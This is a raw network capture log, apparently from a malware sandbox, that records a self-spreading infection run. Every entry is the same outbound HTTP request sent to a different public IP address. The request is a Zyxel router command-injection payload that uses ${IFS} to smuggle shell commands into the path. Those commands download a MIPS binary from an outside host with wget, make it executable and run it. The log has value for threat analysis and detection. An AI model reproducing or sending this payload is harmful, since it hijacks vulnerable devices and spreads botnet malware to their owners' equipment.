                                                        Feb 2, 2024 06:21:31.361639023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9606192.168.2.144633696.215.36.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361696005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9607192.168.2.144511051.238.42.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361722946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9608192.168.2.143569244.70.58.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361774921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9609192.168.2.14413709.232.35.103443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361803055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9610192.168.2.1449940213.142.99.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361864090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9611192.168.2.144355491.31.17.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361901045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9612192.168.2.144638462.52.69.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361933947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9613192.168.2.1443310120.81.133.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.361977100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9614192.168.2.145882820.8.37.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362019062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9615192.168.2.1446404141.180.250.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362061024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9616192.168.2.1442840153.102.205.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362092018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9617192.168.2.145273837.40.56.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362127066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9618192.168.2.1435344204.154.189.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362168074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9619192.168.2.145757834.127.48.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362226009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9620192.168.2.1450208121.32.194.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362265110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9621192.168.2.1454850114.225.27.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362287045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9622192.168.2.1448572218.157.159.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362318993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9623192.168.2.1451860130.102.137.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362406969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9624192.168.2.1454684102.166.178.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362457037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9625192.168.2.1434114198.137.225.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362504005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9626192.168.2.145678247.2.245.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362546921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9627192.168.2.1446780153.252.123.33443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362602949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9628192.168.2.1456138151.201.161.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362632036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9629192.168.2.143604047.111.142.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362699986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9630192.168.2.1448458202.244.251.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362720013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9631192.168.2.145731262.87.194.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362761021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9632192.168.2.143472249.8.6.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362788916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9633192.168.2.1459244171.93.212.13443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362847090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9634192.168.2.1436950160.58.147.85443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362880945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9635192.168.2.144338289.254.77.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362932920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9636192.168.2.1458454117.33.229.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362968922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9637192.168.2.1442156123.145.71.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.362993956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9638192.168.2.14362268.33.26.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363050938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9639192.168.2.1438592156.164.192.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363080025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9640192.168.2.145025691.233.43.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363123894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9641192.168.2.144001275.131.143.136443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363153934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9642192.168.2.143888241.234.102.84443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363182068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9643192.168.2.143376658.24.42.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363213062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9644192.168.2.1460206160.45.234.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363262892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9645192.168.2.1435852136.237.16.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363291979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9646192.168.2.144142871.213.213.250443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363329887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9647192.168.2.1433258107.205.215.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363368988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9648192.168.2.1433484169.232.38.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363430977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9649192.168.2.1440750111.54.180.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363464117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9650192.168.2.1438160208.183.110.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363501072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9651192.168.2.1460306137.124.27.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363552094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9652192.168.2.1440656195.222.94.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363580942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9653192.168.2.1453580150.237.0.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363629103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9654192.168.2.1441236126.72.28.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363657951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9655192.168.2.145438868.225.253.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363687992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9656192.168.2.1459124162.221.152.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363743067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9657192.168.2.145554276.139.84.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363797903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9658192.168.2.1440228152.37.30.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363832951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9659192.168.2.1443480213.250.131.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363882065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9660192.168.2.1456478128.134.127.34443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363914967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9661192.168.2.145393654.24.199.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363959074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9662192.168.2.1450868124.212.250.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.363986969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9663192.168.2.144176468.74.10.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364049911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9664192.168.2.1441660149.87.41.241443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364084959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9665192.168.2.1440108184.8.245.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364128113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9666192.168.2.14464204.59.171.130443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364188910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9667192.168.2.1432886182.48.9.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:31.364219904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9668192.168.2.1440332148.88.199.172443
                                                        TimestampBytes transferredDirectionData
